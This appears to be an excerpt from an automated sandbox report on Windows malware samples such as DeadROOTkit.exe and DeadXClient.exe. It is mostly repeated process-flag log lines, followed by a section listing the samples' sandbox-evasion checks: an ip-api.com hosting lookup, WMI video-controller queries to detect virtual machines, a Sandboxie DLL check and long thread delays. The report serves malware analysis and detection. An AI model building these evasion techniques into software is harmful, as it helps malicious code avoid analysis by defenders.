                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Deadsvchost.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIADAP.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Check if machine is in data center or colocation facility
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                        Source: C:\Users\Public\DeadXClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\Public\DeadXClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\Public\DeadXClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\Public\DeadXClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\Public\DeadXClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\Public\DeadXClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\Public\DeadXClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: DeadROOTkit.exe, 00000007.00000002.2316235027.000000000303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                        Source: 1.exe, 00000004.00000002.2208653873.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000007.00000000.2203959868.0000000000DD2000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: SBIEDLL.DLLINFO
                        Source: C:\Users\user\AppData\Local\Temp\1.exeMemory allocated: 2D00000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1.exeMemory allocated: 1AFB0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeMemory allocated: 2D50000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\Public\DeadXClient.exeMemory allocated: 1ADE0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeMemory allocated: 1510000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\Public\DeadROOTkit.exeMemory allocated: 1B030000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\Public\Deadsvchost.exeMemory allocated: AA0000 memory reserve | memory write watch
                        Source: C:\Users\Public\Deadsvchost.exeMemory allocated: 1A590000 memory reserve | memory write watch
                        Source: C:\Users\Public\Deadsvchost.exeMemory allocated: 1490000 memory reserve | memory write watch
                        Source: C:\Users\Public\Deadsvchost.exeMemory allocated: 1AEE0000 memory reserve | memory write watch
                        Source: C:\Users\Public\Deadsvchost.exeMemory allocated: 16D0000 memory reserve | memory write watch
                        Source: C:\Users\Public\Deadsvchost.exeMemory allocated: 1B090000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\1.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\Public\DeadXClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\Public\Deadsvchost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\dllhost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\Public\Deadsvchost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\Public\Deadsvchost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\Public\DeadXClient.exeWindow / User API: threadDelayed 5206Jump to behavior
                        Source: C:\Users\Public\DeadXClient.exeWindow / User API: threadDelayed 4625Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4234
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4440
                        Source: C:\Windows\System32\dllhost.exeWindow / User API: threadDelayed 488
                        Source: C:\Windows\System32\winlogon.exeWindow / User API: threadDelayed 9986
                        Source: C:\Windows\System32\lsass.exeWindow / User API: threadDelayed 9948
                        Source: C:\Windows\System32\dwm.exeWindow / User API: threadDelayed 9870
                        Source: C:\Windows\System32\wbem\WMIADAP.exeWindow / User API: threadDelayed 1810
